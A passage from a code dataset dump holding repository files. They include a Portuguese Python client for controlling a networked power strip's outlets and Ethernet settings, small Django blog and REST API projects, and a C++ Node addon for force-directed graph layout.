Ligar/Desligar Tomada:\n resp = self.vd.ctrlAc(1,0) #args: tomada 1 e op 0. Inverte o estado da tomada 1 (Liga/Desliga)\n #print(resp.status_code)\n #print(resp.content.decode())# devido ao atributo content ser em bytes\n\n### 4.2. Configurar status (Habilitada/Desabilitada) e nome da Tomada:\n resp = self.vd.ctrlAc(3, 2, True, 'teste_tomada'); #args: tomada 3, op 2 e habilita True. Configura o status da tomada como 'Habilitada' e o nome da tomada 3 para 'teste_tomada'\n #print(resp.status_code)\n #print(resp.content.decode())# devido ao atributo content ser em bytes\n \n\n## 5. Configurar interface Ethernet\n \n \"\"\" def configEthernet(self, boolDhcp, newhost, newip, newgtw, newmask, newdns1, newdns2):\n\n À função configEthernet, devem ser passados os argumentos: \n -boolDhcp: Boolean (True habilita DHCP do equipamento / False desabilita)\n -newhost: String ( Hostname à ser configurado no equipamento)\n -newip: String ( Endereço IP a ser configurado no equipamento)\n -newgtw: String ( Endereço de gateway a ser configurado no equipamento)\n -newmask: String ( Máscara de rede a ser configurada no equipamento)\n -newdns1: String ( Endereço de DNS primário)\n -newdns2: String ( Endereço de DNS secundário)\n\n Este método retorna um objeto requests.Response com o código de resposta HTTP da requisição realizada no atributo status_code e a informação de erro em caso de código de resposta diferente de 200, acessível no atributo content\n {\n 200: sucesso\n 401: Falha na autenticacação\n 500: Equipamento não localizado\n }\n\n \"\"\"\n resp = self.vd.configEthernet(boolDhcp, newhost, newip, newgtw, newmask, newdns1, newdns2)\n### Exemplo\n \"\"\"\n Configurar a interface de rede com os argumentos:\n Hostname: 'Filtro de Linha'\n IP: '192.168.0.91'\n Gateway: '192.168.0.1'\n Máscara de rede: '255.255.255.0'\n DNS Primário: '8.8.8.8'\n DNS Secundário: '8.8.4.4'\n\n \n \"\"\"\n resp = self.vd.configEthernet(False, 'Filtro de Linha', '192.168.0.91', '192.168.0.1', '255.255.255.0', '8.8.8.8', '8.8.4.4');\n #print(resp.status_code)\n #print(resp.content.decode())# devido ao atributo content ser em bytes"
},
{
"alpha_fraction": 0.5157784223556519,
"alphanum_fraction": 0.5359396934509277,
"avg_line_length": 39.460994720458984,
"blob_id": "18f21e682a8239febae72828480dedf6a21098f2",
"content_id": "cbc8324576b85153bc0af6c6ea98b0ff9bde36d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5706,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 141,
"path": "/voltdevice.py",
"repo_name": "volt-tecnologia/API_PYTHON_Example",
"src_encoding": "UTF-8",
"text": "import requests,json;\nfrom requests.auth import HTTPBasicAuth;\nfrom requests.exceptions import Timeout;\nclass VoltDevice:\n\n def __init__(self, username, password,ip):\n self.ip = ip if len(ip) > 0 else '127.0.0.1'\n self.username = username;\n self.password = password;\n #print(self.updateInfo())\n\n #print(self.lastInfo)\n\n def updateInfo(self):\n resp = self.reqGETHTTP('http://'+self.ip+'/status.json');\n \n if resp.status_code == 200:\n self.lastInfo = resp.json();\n \n #else: \n #print(resp.status_code);\n\n #self.lastInfo = 0;\n \n return resp.status_code;\n\n def reqGETHTTP(self, url):\n print(url);\n try:\n response = requests.get(url,auth=HTTPBasicAuth(self.username,self.password), timeout=2);\n #print(response.status_code)\n if response.status_code == 401:\n response._content = b''\n\n return response;\n except Timeout:\n print('Erro de Timeout')\n response = requests.Response()\n response.status_code = 500\n response._content = b''\n \n return response\n\n \n def reqPOSTHTTP(self, url, payload):\n print(url);\n try:\n response = requests.post(url,auth=HTTPBasicAuth(self.username,self.password),data=payload, timeout=2);\n #print(response.status_code)\n return response;\n except Timeout:\n print('Erro de Timeout')\n response = requests.Response()\n response.status_code = 500\n response._content = b''\n \n return response\n\n def configEthernet(self, boolDhcp, newhost, newip, newgtw, newmask, newdns1, newdns2):\n payload = {'dhcp':('true' if boolDhcp == True else 'false'),'host':newhost,'ip':newip,'gw':newgtw,'sub':newmask,'dns1':newdns1, 'dns2':newdns2}\n #print(payload)\n response = self.reqPOSTHTTP('http://'+self.ip+'/config.htm?', payload)\n \n if(response.status_code == 200): \n response = self.reqGETHTTP(\"http://\" + self.ip + \"/reset.cgi?timeout=1\")\n return response\n else: \n return response\n \n\n def ctrlAc(self, tomada, op, habilita=True, ac_name=lambda: getNomeAC(tomada)):\n if(self.lastInfo != 0):\n \n if op == 0:\n if(self.getRmac(tomada)): \n return self.reqGETHTTP(\"http://\" + self.ip + \"/outpoe.cgi?poe=\" + str(tomada) + \"&sts=\"+('0' if self.getAc(tomada) else'1')+\"&pr=0\");\n \n else: \n response = requests.Response()\n response.status_code = 0\n response._content = b'Porta '+str(tomada).encode()+b' desabilitada!!'\n return response\n \n elif op == 1: \n #if(len(ac_name)>0):\n return self.reqGETHTTP(\"http://\" + self.ip + \"/output.htm?porta=\" + str(tomada) + \"&rmac=\" + (\"true\" if habilita else \"false\") + \"&nt=\" + ac_name);\n \n #else: return \"Digite um nome válido para a tomada!!\";\n \n else: return 'Equipamento não conectado';\n\n def getRmac(self, tomada):\n resp = False\n if tomada == 1: resp = self.lastInfo['rmac1'] == 'true';\n elif tomada == 2: resp = self.lastInfo['rmac2'] == 'true';\n elif tomada == 3: resp = self.lastInfo['rmac3'] == 'true';\n elif tomada == 4: resp = self.lastInfo['rmac4'] == 'true';\n elif tomada == 5: resp = self.lastInfo['rmac5'] == 'true';\n elif tomada == 6: resp = self.lastInfo['rmac6'] == 'true';\n elif tomada == 7: resp = self.lastInfo['rmac7'] == 'true';\n elif tomada == 8: resp = self.lastInfo['rmac8'] == 'true';\n elif tomada == 9: resp = self.lastInfo['rmac9'] == 'true';\n elif tomada == 10: resp = self.lastInfo['rmac10'] == 'true';\n\n return resp;\n\n def getAc(self, tomada):\n resp = False\n if tomada == 1: resp = self.lastInfo['ac0'] =='0';\n elif tomada == 2: resp = self.lastInfo['ac1'] =='0';\n elif tomada == 3: resp = self.lastInfo['ac2'] =='0';\n elif tomada == 4: resp = 
self.lastInfo['ac3'] =='0';\n elif tomada == 5: resp = self.lastInfo['ac4'] =='0';\n elif tomada == 6: resp = self.lastInfo['ac5'] =='0';\n elif tomada == 7: resp = self.lastInfo['ac6'] =='0';\n elif tomada == 8: resp = self.lastInfo['ac7'] =='0';\n elif tomada == 9: resp = self.lastInfo['ac8'] =='0';\n elif tomada == 10: resp = self.lastInfo['ac9'] =='0';\n\n return resp;\n\n def getNomeAC(self, tomada):\n if tomada == 1: return self.lastInfo['nt1']\n elif tomada == 2: return self.lastInfo['nt2']\n elif tomada == 3: return self.lastInfo['nt3']\n elif tomada == 4: return self.lastInfo['nt4']\n elif tomada == 5: return self.lastInfo['nt5']\n elif tomada == 6: return self.lastInfo['nt6']\n elif tomada == 7: return self.lastInfo['nt7']\n elif tomada == 8: return self.lastInfo['nt8']\n elif tomada == 9: return self.lastInfo['nt9']\n elif tomada == 10: return self.lastInfo['nt10']\n\n def getDate(self):\n return self.lastInfo['rtc_days']+'/'+self.lastInfo['rtc_months']+'/'+self.lastInfo['rtc_years']\n\n def getTime(self):\n return self.lastInfo['rtc_hours']+':'+self.lastInfo['rtc_minutes']+':'+self.lastInfo['rtc_seconds']\n\n def getUptime(self):\n return self.lastInfo['updia']+'d '+self.lastInfo['uphora']+'h '+self.lastInfo['upmin']+'m'"
}
] | 5 |
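Every operation in `voltdevice.py` above reduces to an HTTP GET or POST with Basic Auth against the device's CGI endpoints, such as `/status.json` and `/outpoe.cgi`. A minimal standalone sketch of toggling outlet 1, using only the endpoints and JSON keys that appear in the record (IP and credentials are the example defaults; adjust to your device):

```python
import requests
from requests.auth import HTTPBasicAuth

ip, auth = '192.168.0.90', HTTPBasicAuth('admin', 'voltvolt')

# Read current state: status.json reports outlet N in key 'ac<N-1>' ('0' = on).
status = requests.get('http://%s/status.json' % ip, auth=auth, timeout=2).json()
is_on = status['ac0'] == '0'

# Toggle outlet 1 via outpoe.cgi (sts=1 turns it on, sts=0 turns it off).
resp = requests.get('http://%s/outpoe.cgi?poe=1&sts=%s&pr=0'
                    % (ip, '0' if is_on else '1'), auth=auth, timeout=2)
print(resp.status_code)
```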
ujjval15/My-blog
|
https://github.com/ujjval15/My-blog
|
f2ee13740c44b2995b4291599eefc44f4db2988e
|
542efe29f625ca33b2feda5c0f59aa9cbe270470
|
e14ec293f63f00aef3bbd9640fbe9e0bf1112478
|
refs/heads/main
| 2023-02-13T06:55:32.821153 | 2020-12-26T18:12:20 | 2020-12-26T18:12:20 | 324,607,707 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7513513565063477,
"alphanum_fraction": 0.7513513565063477,
"avg_line_length": 35.20000076293945,
"blob_id": "637e353ec25dcb6c00dd03b64dee0cd541186096",
"content_id": "68a40a1e6c5449483a5f0a0bc9c7e3533c1c3b95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 185,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 5,
"path": "/homes/views.py",
"repo_name": "ujjval15/My-blog",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render, HttpResponse, redirect\nfrom blog.models import Post\n# Create your views here.\ndef home(request): \n return render(request, \"home/home.html\")\n\n\n\n\n"
}
] | 1 |
sarun11/REST_API_Django
|
https://github.com/sarun11/REST_API_Django
|
17f212aa139e7e911eba9992ccf8e4fa7859a1b5
|
2231ae5b2b16d80eeceba7588f94b61ca00a808f
|
f3c3574e480014cedaedd8ef04674508fc6e6299
|
refs/heads/main
| 2023-01-19T14:02:59.161790 | 2020-11-25T11:09:08 | 2020-11-25T11:09:08 | 315,597,658 | 0 | 0 | null | 2020-11-24T10:32:41 | 2020-11-25T09:35:49 | 2020-11-25T11:09:08 |
Python
|
[
{
"alpha_fraction": 0.7011764645576477,
"alphanum_fraction": 0.7176470756530762,
"avg_line_length": 27.33333396911621,
"blob_id": "d09160c29c7767b50ffe0b50e641d60650ec9c3b",
"content_id": "e5976618438108e46b6d7df37717bd0ff6194990",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 425,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 15,
"path": "/core/models.py",
"repo_name": "sarun11/REST_API_Django",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth import get_user_model\n# Create your models here.\n\n\nUser = get_user_model()\n\nclass Post(models.Model):\n title = models.CharField(max_length=1000)\n description = models.CharField(max_length=500) \n date_created = models.DateTimeField(auto_now_add=True)\n owner = models.ForeignKey(User, on_delete=models.CASCADE)\n\n def __str__(self):\n return self.title\n"
},
{
"alpha_fraction": 0.807692289352417,
"alphanum_fraction": 0.807692289352417,
"avg_line_length": 25,
"blob_id": "80c187fead4efe8a9d5d5ebc6abb4010f51ef5f4",
"content_id": "db30312c049c928c69700b009cad307b5a42b40a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 2,
"path": "/README.md",
"repo_name": "sarun11/REST_API_Django",
"src_encoding": "UTF-8",
"text": "# REST_API_Django\nREST API Development using Django\n"
},
{
"alpha_fraction": 0.5022421479225159,
"alphanum_fraction": 0.6995515823364258,
"avg_line_length": 16.153846740722656,
"blob_id": "6f5c3674127458304f87b924a47b56a94f9fca48",
"content_id": "dfb80a96b7db317067ba4387a7de7eb175dd4401",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 223,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 13,
"path": "/requirements.txt",
"repo_name": "sarun11/REST_API_Django",
"src_encoding": "UTF-8",
"text": "asgiref==3.3.1\nDjango==3.1.3\ndjango-rest-auth==0.9.5\ndjangorestframework==3.12.2\nflake8==3.8.4\nimportlib-metadata==3.1.0\nmccabe==0.6.1\npycodestyle==2.6.0\npyflakes==2.2.0\npytz==2020.4\nsix==1.15.0\nsqlparse==0.4.1\nzipp==3.4.0\n"
},
{
"alpha_fraction": 0.6454976201057434,
"alphanum_fraction": 0.649289071559906,
"avg_line_length": 26.05128288269043,
"blob_id": "67d5fdf6f3b018b1aefc092c3a41d59f16f7e290",
"content_id": "4007cc34c10ad64c7e98d82ac84f6b1202eda106",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1055,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 39,
"path": "/core/views.py",
"repo_name": "sarun11/REST_API_Django",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http import JsonResponse\n\nfrom .models import Post\nfrom .serializers import PostSerializer\n\n# third party imports\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAuthenticated\n\n# Create your views here.\n\n\nclass TestView(APIView):\n \n permission_classes = (IsAuthenticated,)\n \n def get(self, request, *args, **kwargs):\n \n qs = Post.objects.all()\n # post = qs.last()\n serializer = PostSerializer(qs, many=True)\n # serializer = PostSerializer(post)\n return Response(serializer.data)\n \n def post(self, request, *args, **kwargs):\n serializer = PostSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors) \n\n# def test_view(request):\n# data = {\n# 'book': 30,\n# 'Pen': 10\n# }\n# return JsonResponse(data)\n"
}
] | 4 |
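`core/views.py` in the record above imports `PostSerializer` from a `serializers` module that is not included in this dump. A plausible minimal definition consistent with how the view uses it (`many=True`, `is_valid()`, `save()`) is a `ModelSerializer` over `Post`; this is a reconstruction under those assumptions, not the repository's actual file:

```python
from rest_framework import serializers
from .models import Post

class PostSerializer(serializers.ModelSerializer):
    """Serialize Post instances for the TestView list/create endpoint."""
    class Meta:
        model = Post
        fields = ('id', 'title', 'description', 'date_created', 'owner')
        read_only_fields = ('date_created',)
```

With this definition, a POST body would supply `title`, `description`, and the `owner` primary key; `date_created` is filled automatically by `auto_now_add` on the model.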
TimHollies/ngraph.native
|
https://github.com/TimHollies/ngraph.native
|
40fb210fcc08f275bf4f31af8451deed9fff228b
|
8d994ec9fa57779c2f44a16436b6f6e0c2c8ee62
|
a4d9601a96dfff0c48b7294c924fb7559b3774be
|
refs/heads/master
| 2021-09-14T22:33:09.222933 | 2018-05-21T13:35:54 | 2018-05-21T13:35:54 | 109,813,554 | 0 | 0 | null | 2017-11-07T09:23:31 | 2017-10-06T20:07:33 | 2017-10-03T23:27:34 | null |
[
{
"alpha_fraction": 0.35039371252059937,
"alphanum_fraction": 0.35433071851730347,
"avg_line_length": 23.190475463867188,
"blob_id": "0f916a1f638bf149f6992355cf8f33f74bc9bdb1",
"content_id": "efeb556603a9f73328ef42133fe9b214180ff67d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 508,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 21,
"path": "/binding.gyp",
"repo_name": "TimHollies/ngraph.native",
"src_encoding": "UTF-8",
"text": "{\n \"targets\": [\n {\n \"target_name\": \"force-layout\",\n \"sources\": [ \"src/main.cc\", \"src/layout.cc\", \"src/quadTree.cc\" ],\n 'conditions': [\n ['OS==\"win\"', {\n 'cflags': [\n '/WX', \"/std:latest\", \"/m\"\n ],\n }, { # OS != \"win\"\n 'cflags': [\n \"-std=c++11\", \"-fpermissive\", \"-fexceptions\"\n ],\n }],\n ],\n 'cflags!': [ '-fno-exceptions' ],\n 'cflags_cc!': [ '-fno-exceptions' ]\n }\n ]\n}\n"
},
{
"alpha_fraction": 0.5709206461906433,
"alphanum_fraction": 0.584955096244812,
"avg_line_length": 27.4255313873291,
"blob_id": "854003ff335b49e3cc3e7a599bbc23024a6635a0",
"content_id": "2bebc4ef16291fc1f78bd3205b4ae3796fcb9a6b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5344,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 188,
"path": "/src/layout.cc",
"repo_name": "TimHollies/ngraph.native",
"src_encoding": "UTF-8",
"text": "//\n// layout.cpp\n// layout++\n//\n// Created by Andrei Kashcha on 5/21/15.\n// Copyright (c) 2015 Andrei Kashcha. All rights reserved.\n//\n\n#include \"layout.h\"\n#include <iostream>\n#include <cmath>\n#include <map>\n\nLayout::Layout() :tree(settings) {}\n\nvoid Layout::init(int* bodyIds, size_t bodyIdSize, int* links, long size) {\n random = Random(42);\n initBodies(bodyIds, bodyIdSize, links, size);\n\n // Now the graph is initialized. Let's make sure we get\n // good initial positions:\n setDefaultBodiesPositions();\n}\n\nvoid Layout::loadPositionsFromArray(int *initialPositions) {\n for (size_t i = 0; i < bodies.size(); ++i) {\n Vector2 initialPos(initialPositions[i * 3 + 0], //+ Random::nextDouble(),\n initialPositions[i * 3 + 1] //+ Random::nextDouble(),\n );\n bodies[i].setPos(initialPos);\n }\n}\n\nvoid Layout::setDefaultBodiesPositions() {\n size_t maxBodyId = bodies.size();\n for (size_t i = 0; i < maxBodyId; ++i) {\n bodies[i].setPos(Vector2(0,0));\n // Body *body = &(bodies[i]);\n // if (!body->positionInitialized()) {\n // Vector2 initialPos(random.nextDouble() * log(maxBodyId) * 100,\n // random.nextDouble() * log(maxBodyId) * 100);\n // bodies[i].setPos(initialPos);\n // }\n // Vector2 *sourcePos = &(body->pos);\n // // init neighbours position:\n // for (size_t j = 0; j < body->springs.size(); ++j) {\n // if (!bodies[body->springs[j]].positionInitialized()) {\n // Vector2 neighbourPosition(\n // sourcePos->x + random.next(settings.springLength) - settings.springLength/2,\n // sourcePos->y + random.next(settings.springLength) - settings.springLength/2\n // );\n // bodies[j].setPos(neighbourPosition);\n // }\n // }\n }\n}\n\nvoid Layout::initBodies(int* bodyIds, size_t bodyIdSize, int* links, long size) {\n\n std::map<int, size_t> bodyMap;\n\n bodies.reserve(bodyIdSize);\n for (int i = 0; i < bodyIdSize; i++) {\n bodies.push_back(Body(bodyIds[i]));\n bodyMap[bodyIds[i]] = i;\n }\n\n // Now that we have bodies, let's add links:\n for (int i = 0; i < size; i+=2) {\n bodies[bodyMap.at(links[i])].springs.push_back(bodyMap.at(links[i+1]));\n bodies[bodyMap.at(links[i+1])].incomingCount += 1;\n }\n\n // Finally, update body mass based on total number of neighbours:\n for (size_t i = 0; i < bodies.size(); i++) {\n Body *body = &(bodies[i]);\n // TODO: Dividing by 2 rather than 3 due to changing to 2d only?\n body->mass = 1 + (body->springs.size() + body->incomingCount)/3.0;\n }\n}\n\nvoid Layout::setBodiesWeight(int *weights) {\n // FIXME: Verify that size of the weights matches size of the bodies.\n // Unfortunately current graph format does not properly store nodes without\n // edges.\n for (size_t i = 0; i < bodies.size(); i++) {\n Body *body = &(bodies[i]);\n body->mass = weights[i];\n }\n}\n\nsize_t Layout::getBodiesCount() {\n return bodies.size();\n}\n\nbool Layout::step() {\n accumulate();\n double totalMovement = integrate();\n // cout << totalMovement << \" move\" << endl;\n return totalMovement < settings.stableThreshold;\n}\n\nvoid Layout::accumulate() {\n tree.insertBodies(bodies);\n\n #pragma omp parallel for\n for (size_t i = 0; i < bodies.size(); i++) {\n Body* body = &bodies[i];\n body->force.reset();\n\n tree.updateBodyForce(&(*body));\n updateDragForce(&(*body));\n }\n\n #pragma omp parallel for\n for (size_t i = 0; i < bodies.size(); i++) {\n Body* body = &bodies[i];\n updateSpringForce(&(*body));\n }\n}\n\ndouble Layout::integrate() {\n double dx = 0, tx = 0,\n dy = 0, ty = 0,\n timeStep = settings.timeStep;\n\n//dx should be private or defined 
inside loop\n //tx need to be reduction variable, or its value will be unpredictable.\n #pragma omp parallel for reduction(+:tx,ty) private(dx,dy)\n for (size_t i = 0; i < bodies.size(); i++) {\n Body* body = &bodies[i];\n double coeff = timeStep / body->mass;\n\n body->velocity.x += coeff * body->force.x;\n body->velocity.y += coeff * body->force.y;\n\n double vx = body->velocity.x,\n vy = body->velocity.y,\n v = sqrt(vx * vx + vy * vy);\n\n if (v > 1) {\n body->velocity.x = vx / v;\n body->velocity.y = vy / v;\n }\n\n dx = timeStep * body->velocity.x;\n dy = timeStep * body->velocity.y;\n\n body->pos.x += dx;\n body->pos.y += dy;\n\n tx += abs(dx); ty += abs(dy);\n }\n\n return (tx * tx + ty * ty)/bodies.size();\n}\n\nvoid Layout::updateDragForce(Body *body) {\n body->force.x -= settings.dragCoeff * body->velocity.x;\n body->force.y -= settings.dragCoeff * body->velocity.y;\n}\n\nvoid Layout::updateSpringForce(Body *source) {\n\n Body *body1 = source;\n for (size_t i = 0; i < source->springs.size(); ++i){\n Body *body2 = &(bodies[source->springs[i]]);\n\n double dx = body2->pos.x - body1->pos.x;\n double dy = body2->pos.y - body1->pos.y;\n double r = sqrt(dx * dx + dy * dy);\n\n if (r == 0) {\n dx = (random.nextDouble() - 0.5) / 50;\n dy = (random.nextDouble() - 0.5) / 50;\n r = sqrt(dx * dx + dy * dy);\n }\n\n double d = r - settings.springLength;\n double coeff = settings.springCoeff * d / r;\n\n body1->force.x += coeff * dx;\n body1->force.y += coeff * dy;\n\n body2->force.x -= coeff * dx;\n body2->force.y -= coeff * dy;\n }\n}\n"
},
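Note on the record above: Layout::integrate() returns (tx*tx + ty*ty)/n as a proxy for total movement, and Layout::step() treats the layout as converged once that value drops below settings.stableThreshold. A minimal Python sketch of the same stop criterion, with an invented relax() update standing in for the real force/integration pass (illustrative only, not part of the repository):

# Hypothetical stand-in for the force pass; only the convergence test mirrors Layout::step().
STABLE_THRESHOLD = 0.009  # same default as LayoutSettings.stableThreshold

def relax(positions):
    # Toy update: pull every point halfway toward the origin.
    moved = [(x * 0.5, y * 0.5) for x, y in positions]
    tx = sum(abs(nx - ox) for (nx, ny), (ox, oy) in zip(moved, positions))
    ty = sum(abs(ny - oy) for (nx, ny), (ox, oy) in zip(moved, positions))
    return moved, (tx * tx + ty * ty) / len(positions)

positions = [(10.0, -4.0), (3.0, 8.0), (-6.0, 2.0)]
movement = float('inf')
while movement >= STABLE_THRESHOLD:  # same comparison as Layout::step()
    positions, movement = relax(positions)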
{
"alpha_fraction": 0.5667870044708252,
"alphanum_fraction": 0.6050541400909424,
"avg_line_length": 17.97260284423828,
"blob_id": "ccbbc16d659a0f8e79792872d1883e566e8355a8",
"content_id": "ad01cbadac660d2aea80de7f8a565d05e32371aa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1385,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 73,
"path": "/src/primitives.h",
"repo_name": "TimHollies/ngraph.native",
"src_encoding": "UTF-8",
"text": "//\n// primitives.h\n// layout++\n//\n// Created by Andrei Kashcha on 5/21/15.\n// Copyright (c) 2015 Andrei Kashcha. All rights reserved.\n//\n\n#ifndef layout___primitives_h\n#define layout___primitives_h\n\n#include <cmath> // std::abs\n#include <vector>\n\nstruct LayoutSettings {\n double stableThreshold = 0.009;\n double gravity = -1.2;\n double theta = 1.2;\n double dragCoeff = 0.02;\n double springCoeff = 0.0008;\n double springLength = 30;\n double timeStep = 20;\n};\n\nstruct Vector2 {\n double x = 0.0;\n double y = 0.0;\n\n Vector2(double _x, double _y) :\n x(_x), y(_y) {};\n\n Vector2() {}\n\n void reset () {\n x = y = 0;\n }\n\n bool sameAs(const Vector2 &other) {\n\n double dx = std::abs(x - other.x);\n double dy = std::abs(y - other.y);\n\n return (dx < 1e-8 && dy < 1e-8);\n }\n};\n\nstruct Body {\n int label;\n Vector2 pos;\n Vector2 prevPos;\n Vector2 force;\n Vector2 velocity;\n double mass = 1.0;\n\n std::vector<int> springs; // these are outgoing connections.\n // This is just a number of incoming connections for this body,\n // so we can count its mass appropriately.\n int incomingCount = 0;\n\n Body(int _label): label(_label) { }\n Body(int _label, Vector2 _pos): label(_label), pos(_pos), prevPos(_pos) {}\n\n void setPos(const Vector2 &_pos) {\n pos = _pos;\n prevPos = _pos;\n }\n\n bool positionInitialized() {\n return pos.x != 0 || pos.y != 0;\n }\n};\n\n#endif\n"
},
{
"alpha_fraction": 0.6208112835884094,
"alphanum_fraction": 0.6384479999542236,
"avg_line_length": 22.625,
"blob_id": "d57d52d1a92999ee04a590e9e91bd9ebb7047d1f",
"content_id": "4f2403e07f477b6b07f7c2f94576be5c2d3fd3e0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 567,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 24,
"path": "/ngraph.native.js",
"repo_name": "TimHollies/ngraph.native",
"src_encoding": "UTF-8",
"text": "var addon = require('bindings')('force-layout');\n\nconst run = (nodes, edges, iterations) => {\n\n const nodeTArray = Int32Array.from(nodes);\n const edgeTArray = Int32Array.from(Array.prototype.concat(...edges));\n\n const rawTArrayResult = addon.runLayout(nodeTArray, edgeTArray, iterations); // 'world'\n\n const rawResult = Array.from(rawTArrayResult);\n\n const result = [];\n for(let i=0; i<nodes.length; i+=1) {\n result.push({\n id: nodes[i],\n x: rawResult[(i*3)+1],\n y: rawResult[(i*3)+2]\n })\n }\n\n return result;\n}\n\nmodule.exports = { run };\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5648148059844971,
"avg_line_length": 17,
"blob_id": "a1dc8961689e844ce3e81c2d67e836368115ca08",
"content_id": "d7818a393ab7466f2116b8993c9b264e2335a939",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 108,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 6,
"path": "/test/main.js",
"repo_name": "TimHollies/ngraph.native",
"src_encoding": "UTF-8",
"text": "const { run } = require('../ngraph.native');\n\n//smoke\nlet res = run([1,2],[[1,2]], 200);\n\nconsole.log(res);\n"
},
{
"alpha_fraction": 0.6645686030387878,
"alphanum_fraction": 0.6824023127555847,
"avg_line_length": 27.886363983154297,
"blob_id": "a8176e429a8fd1478bc43e8da2dbb7d18ff20ea1",
"content_id": "ce3a821cab400023d5d0385bde3898b30f88a0d8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3813,
"license_type": "permissive",
"max_line_length": 126,
"num_lines": 132,
"path": "/src/main.cc",
"repo_name": "TimHollies/ngraph.native",
"src_encoding": "UTF-8",
"text": "#include <node_api.h>\n#include <assert.h>\n#include <vector>\n#include <stdio.h>\n#include <iostream>\n\n#include \"layout.h\"\n\nnapi_value RunLayout(napi_env env, napi_callback_info info) {\n napi_status status;\n\n #pragma region validateInput\n\n size_t argc = 3;\n napi_value args[3];\n status = napi_get_cb_info(env, info, &argc, args, nullptr, nullptr);\n assert(status == napi_ok);\n\n if (argc < 3) {\n napi_throw_type_error(env, nullptr, \"Wrong number of arguments\");\n return nullptr;\n }\n\n napi_valuetype valuetype0;\n status = napi_typeof(env, args[0], &valuetype0);\n assert(status == napi_ok);\n\n napi_valuetype valuetype1;\n status = napi_typeof(env, args[1], &valuetype1);\n assert(status == napi_ok);\n\n napi_valuetype valuetype2;\n status = napi_typeof(env, args[2], &valuetype2);\n assert(status == napi_ok);\n\n if (valuetype0 != napi_object || valuetype1 != napi_object || valuetype2 != napi_number) {\n napi_throw_type_error(env, nullptr, \"Wrong arguments\");\n return nullptr;\n }\n\n bool istypedarray0;\n status = napi_is_typedarray(env, args[0], &istypedarray0);\n assert(status == napi_ok);\n\n bool istypedarray1;\n status = napi_is_typedarray(env, args[1], &istypedarray1);\n assert(status == napi_ok);\n\n if(!istypedarray0 || !istypedarray1) {\n napi_throw_type_error(env, nullptr, \"Both arguments must be int32array\");\n return nullptr;\n }\n\n napi_typedarray_type nodesTaType;\n size_t nodesLength;\n void* nodesDataRaw;\n size_t nodesOffset;\n napi_value nodesArraybuffer;\n status = napi_get_typedarray_info(env, args[0], &nodesTaType, &nodesLength, &nodesDataRaw, &nodesArraybuffer, &nodesOffset);\n assert(status == napi_ok);\n\n napi_typedarray_type edgesTaType;\n size_t edgesLength;\n void* edgesDataRaw;\n size_t edgesOffset;\n napi_value edgesArraybuffer;\n status = napi_get_typedarray_info(env, args[1], &edgesTaType, &edgesLength, &edgesDataRaw, &edgesArraybuffer, &edgesOffset);\n assert(status == napi_ok);\n\n if(nodesTaType != napi_int32_array || edgesTaType != napi_int32_array) {\n napi_throw_type_error(env, nullptr, \"Both arguments must be int32array\");\n return nullptr;\n }\n\n int iterations;\n status = napi_get_value_int32(env, args[2], &iterations);\n assert(status == napi_ok);\n\n #pragma endregion validate input\n\n int32_t* nodesData = static_cast<int32_t*>(nodesDataRaw);\n int32_t* edgesData = static_cast<int32_t*>(edgesDataRaw);\n\n Layout graphLayout;\n graphLayout.init(nodesData, nodesLength, edgesData, edgesLength);\n\n for (int i = 0; i < iterations; ++i) {\n bool done = graphLayout.step();\n if (done) {\n break;\n }\n }\n\n napi_value result_array_buffer;\n void* result_data;\n status = napi_create_arraybuffer(env, nodesLength * sizeof(int32_t) * 3, &result_data, &result_array_buffer);\n assert(status == napi_ok);\n \n int32_t* resultValues = static_cast<int32_t*>(result_data);\n\n std::vector<Body>* bodies = graphLayout.getBodies();\n\n for(int i=0; i<nodesLength; i+=1) {\n resultValues[i*3] = nodesData[i];\n resultValues[(i*3) + 1] = (int)std::round((*bodies)[i].pos.x);\n resultValues[(i*3) + 2] = (int)std::round((*bodies)[i].pos.y);\n }\n\n #pragma region createOutput\n\n \n napi_value result;\n status = napi_create_typedarray(env, napi_int32_array, nodesLength * 3, result_array_buffer, nodesOffset, &result);\n assert(status == napi_ok);\n\n #pragma endregion createOutput\n\n return result;\n}\n\n#define DECLARE_NAPI_METHOD(name, func) \\\n { name, 0, func, 0, 0, 0, napi_default, 0 }\n\nnapi_value Init(napi_env env, napi_value 
